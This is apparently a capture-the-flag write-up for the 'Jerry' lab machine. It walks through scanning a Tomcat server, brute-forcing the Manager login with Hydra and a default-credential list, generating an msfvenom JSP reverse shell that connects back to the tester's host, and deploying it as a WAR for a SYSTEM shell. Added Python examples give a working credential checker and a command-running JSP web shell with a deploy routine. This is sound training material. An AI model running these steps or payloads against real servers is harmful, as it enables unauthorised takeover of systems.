# Jerry

## Scanning and Enumeration

```
└─$ nmap -sC -sV -p 8080 10.10.10.95 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 17:04 EST
Nmap scan report for 10.10.10.95
Host is up (0.10s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.02 seconds
```

## Web Page found

![](/files/-MTctIKeKjd98X7YhTwq)

## Found Credentials

![](/files/-MTctYOpKm-wiLeFcfVk)

## Attempting Brute Force with HYDRA

![](/files/-MTctoK6BoE9dR2pI6cP)

```
# wordlist brute force with Hydra (Tomcat default-credential list from seclists)
apt install seclists
find /usr/share/seclists | grep -i tomcat
hydra -h
└─$ HYDRA_PROXY_HTTP=http://127.0.0.1:8080 hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt -s 8080 10.10.10.95 http-get /manager/html 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-15 22:49:54
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[DATA] max 16 tasks per 1 server, overall 16 tasks, 79 login tries, ~5 tries per task
[DATA] attacking http-get://10.10.10.95:8080/manager/html
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret
[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret
1 of 1 target successfully completed, 4 valid passwords found
```

Hydra reports "4 valid passwords", but these are only two distinct pairs, admin:admin and tomcat:s3cret, each printed twice. The `-C` option feeds colon-separated user:pass pairs from the seclists file, and `http-get` simply sends each pair as HTTP Basic authentication against `/manager/html`. Setting `HYDRA_PROXY_HTTP` routed every attempt through Burp on 127.0.0.1:8080, so the requests and the server's responses are also visible in the proxy history.
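The same check Hydra performs above, written out as an added example (not code from the original writeup): parse a seclists-style `user:pass` list, send each pair as HTTP Basic auth to the Manager page and keep only the pairs that get a 200. The target URL, the sample wordlist lines and the fake transport used for offline testing are constructed for this example. Tomcat answers 401 for bad credentials and 403 for a valid account that lacks the `manager-gui` role, so the example reports success only on 200 and deduplicates the list up front, which also avoids the doubled hits seen in the Hydra output.

```python
"""Tomcat Manager credential check over HTTP Basic auth.
Added example, not from the original writeup; host, port and sample list are assumptions."""
import base64
import urllib.error
import urllib.request


def load_pairs(text):
    """Parse 'user:pass' lines (seclists format), dropping blanks, comments and duplicates."""
    seen, pairs = set(), []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, _, pw = line.partition(":")
        if (user, pw) not in seen:
            seen.add((user, pw))
            pairs.append((user, pw))
    return pairs


def basic_auth_header(user, pw):
    """Value of the Authorization header for HTTP Basic: base64("user:pass")."""
    return "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()


def http_status(url, headers):
    """Default transport: return the HTTP status code, treating 4xx/5xx as a result, not an error."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def find_valid(url, pairs, status_fn=http_status):
    """Return the (user, pw) pairs that open the Manager page (HTTP 200).
    401 = bad credentials, 403 = authenticated but missing manager-gui; neither counts."""
    valid = []
    for user, pw in pairs:
        code = status_fn(url, {"Authorization": basic_auth_header(user, pw)})
        if code == 200:
            valid.append((user, pw))
    return valid


# Constructed sample in the same format as tomcat-betterdefaultpasslist.txt.
SAMPLE_LIST = """# constructed sample list
admin:admin
tomcat:tomcat
tomcat:s3cret
admin:admin
"""

if __name__ == "__main__":
    target = "http://10.10.10.95:8080/manager/html"  # assumed target from the scan above
    print(find_valid(target, load_pairs(SAMPLE_LIST)))
```

Swapping `status_fn` for a stub lets the logic be exercised without a live target; against a real host the default `http_status` transport is used.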

Logging in to the Manager application with tomcat:s3cret, we find something useful: a "WAR file to deploy" upload section. The server information shown on the same page also tells us this is a Windows host. Take a look here.

![](/files/-MTcyPppUdp_JPrxqiIE)

Let's try to upload a WAR file. A WAR is just a ZIP archive with a fixed layout that Tomcat unpacks and deploys as a web application; any JSP inside it is compiled and executed server-side as soon as it is requested. So the plan is to build a WAR whose JSP is a reverse shell and let the Manager deploy it for us.

## Generating a shell and establishing connection

```
# generate a WAR containing a JSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=9001 -f war > shell.war

# set up the listener, then deploy shell.war through the Manager upload form and browse to its context path
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>
```

The shell lands directly as `nt authority\system` because the Tomcat service on this host runs under the LocalSystem account, so no privilege escalation step is needed.
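To make the WAR step concrete, here is an added example (not from the original writeup and not the msfvenom payload used above) that builds a minimal WAR in Python's `zipfile` and prepares the deployment request for the Tomcat Manager. The JSP is a constructed command-runner for proof of execution; the host, credentials and context path `ex` are assumptions. It targets the Manager text interface (`PUT /manager/text/deploy?path=/ex`), which requires the `manager-script` role; the page does not confirm that this account holds it, in which case the HTML upload form used in the writeup is the way in.

```python
"""Build a single-JSP WAR and deploy it via the Tomcat Manager text interface.
Added example, not from the original writeup; target, credentials and JSP are assumptions."""
import base64
import io
import urllib.request
import zipfile

# Constructed JSP: runs ?cmd=... and returns stdout. Tomcat compiles it on first request.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
  }
%>
"""


def build_war(jsp_name="index.jsp", jsp_source=CMD_JSP):
    """Return WAR bytes: a ZIP with the JSP at its root.
    A plain JSP needs no WEB-INF/web.xml, so the archive stays minimal."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_members(war_bytes):
    """List the entries of a WAR, e.g. to confirm the JSP is where Tomcat will look for it."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return z.namelist()


def deploy_request(base, context, war_bytes, user, pw):
    """Build (not send) the PUT the Manager text interface expects:
    PUT /manager/text/deploy?path=/<context> with the WAR bytes as the body (manager-script role)."""
    token = base64.b64encode(f"{user}:{pw}".encode()).decode()
    return urllib.request.Request(
        f"{base}/manager/text/deploy?path=/{context}",
        data=war_bytes,
        method="PUT",
        headers={"Authorization": "Basic " + token,
                 "Content-Type": "application/octet-stream"},
    )


def deploy(base, context, war_bytes, user, pw):
    """Send the deployment; Tomcat replies 'OK - Deployed application at context path /<context>' on success."""
    with urllib.request.urlopen(deploy_request(base, context, war_bytes, user, pw), timeout=15) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # Assumed target and credentials from the sections above.
    war = build_war()
    print(deploy("http://10.10.10.95:8080", "ex", war, "tomcat", "s3cret"))
    # then request http://10.10.10.95:8080/ex/index.jsp?cmd=whoami
```

Because the JSP sits at the archive root, it is reachable at `/<context>/index.jsp` as soon as the Manager reports the deployment; the same `build_war` output can be handed to the HTML upload form instead of the text interface if only `manager-gui` is available.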
